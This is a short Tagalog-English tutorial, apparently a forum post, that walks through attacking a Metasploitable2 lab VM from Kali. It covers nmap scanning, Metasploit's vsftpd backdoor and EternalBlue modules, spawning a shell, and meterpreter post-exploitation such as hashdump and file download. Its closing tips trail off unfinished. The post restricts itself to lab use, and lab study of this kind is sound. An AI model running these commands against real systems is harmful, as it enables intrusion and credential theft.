PHNinjaWangya
Grasshopper
Gamitin lang ito sa:
- Sarili mong VM
- Lab environment (Kali + Metasploitable)
Huwag sa real targets (îllégâl yan)
1. Install Target VM (Metasploitable2)
- Download: Metasploitable2
- Import sa VMware
- Start mo
2. Check IP Address ng Target
Sa Metasploitable terminal:ifconfig<br>
Example output:
192.168.1.10<br>
3. Check Kali Linux IP
ip a<br>Example:
192.168.1.5<br>
Dapat same network sila
Use Nmap
nmap -A 192.168.1.10<br>Makikita mo:
- Open ports
- Services (FTP, SMB, HTTP)
- OS
21/tcp open ftp<br>445/tcp open smb<br>
Ito ang hahanapan natin ng exploit
sudo msfconsole<br>Hintayin mag load.
Example: SMB vulnerabilitysearch smb<br>
or specific:
search type:exploit smb<br>
Example:use exploit/unix/ftp/vsftpd_234_backdoor<br>
show options<br>Makikita mo:
- RHOSTS (target IP)
- RPORT
set RHOSTS 192.168.1.10<br>Optional:
set RPORT 21<br>
exploit<br>or:
run<br>
Kapag successful:Command shell session opened<br>
Try commands:
whoami<br>ls<br>pwd<br>
Kung basic shell lang:sessions<br>
Then:
sessions -i 1<br>
Upgrade:
python -c 'import pty; pty.spawn("/bin/bash")'<br>
Kung meterpreter session:sysinfo<br>
getuid<br>
screenshot<br>
hashdump<br>
Examples:Dump passwords:
hashdump<br>Navigate files:
cd /home<br>ls<br>Download file:
download file.txt<br>
use exploit/windows/smb/ms17_010_eternalblue<br>set RHOSTS 192.168.1.10<br>set LHOST 192.168.1.5<br>exploit<br>
help<br>search<br>use<br>set<br>show options<br>exploit<br>sessions<br>background<br>
- Scan → nmap
- Find vulnerability
- Search exploit → search
- Configure → set
- Execute → exploit
- Access system → shell/meterpreter
- Post exploitation
- Always use:
- Use:
para pumili ng payload
- Use:
para maintindihan exploit